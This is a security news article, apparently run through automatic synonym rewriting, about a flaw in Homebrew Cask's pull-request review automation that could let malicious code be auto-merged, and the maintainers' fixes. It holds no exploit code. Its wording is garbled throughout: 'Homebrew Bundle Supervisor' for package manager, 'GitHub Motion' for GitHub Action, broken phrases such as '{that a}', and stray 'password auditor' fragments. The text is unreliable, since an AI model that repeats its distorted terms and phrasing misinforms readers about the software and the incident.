Essential RCE Bug Present in Homebrew Bundle Supervisor for macOS and Linux


homebrew package manager

A just lately recognized safety vulnerability within the official Homebrew Cask repository might have been exploited by an attacker to execute arbitrary code on customers’ machines which have Homebrew put in.

The difficulty, which was reported to the maintainers on April 18 by a Japanese safety researcher named RyotaK, stemmed from the best way code modifications in its GitHub repository have been dealt with, leading to a situation the place a malicious pull request — i.e., the proposed modifications — might be robotically reviewed and accepted. The flaw was fastened on April 19.

password auditor

Homebrew is a free and open-source software program bundle supervisor answer that permits the set up of software program on Apple’s macOS working system in addition to Linux. Homebrew Cask extends the performance to incorporate command-line workflows for GUI-based macOS purposes, fonts, plugins, and different non-open supply software program.

“The found vulnerability would enable an attacker to inject arbitrary code right into a cask and have or not it’s merged robotically,” Homebrew’s Markus Reiter said. “This is because of a flaw within the git_diff dependency of the review-cask-pr GitHub Motion, which is used to parse a pull request’s diff for inspection. As a consequence of this flaw, the parser might be spoofed into utterly ignoring the offending strains, leading to efficiently approving a malicious pull request.”

In different phrases, the flaw meant malicious code injected into the Cask repository was merged with none assessment and approval.

password auditor

The researcher additionally submitted a proof-of-concept (PoC) pull request demonstrating the vulnerability, following which it was reverted. In gentle of the findings, Homebrew has additionally eliminated the “automerge” GitHub Motion in addition to disabled and eliminated the “review-cask-pr” GitHub Motion from all susceptible repositories.

As well as, the power for bots to decide to homebrew/cask* repositories has been eliminated, with all pull requests requiring a handbook assessment and approval by a maintainer going ahead. No person motion is required.

“If this vulnerability was abused by a malicious actor, it might be used to compromise the machines that run brew earlier than it will get reverted,” the researcher said. “So I strongly really feel {that a} safety audit towards the centralized ecosystem is required.”





Source link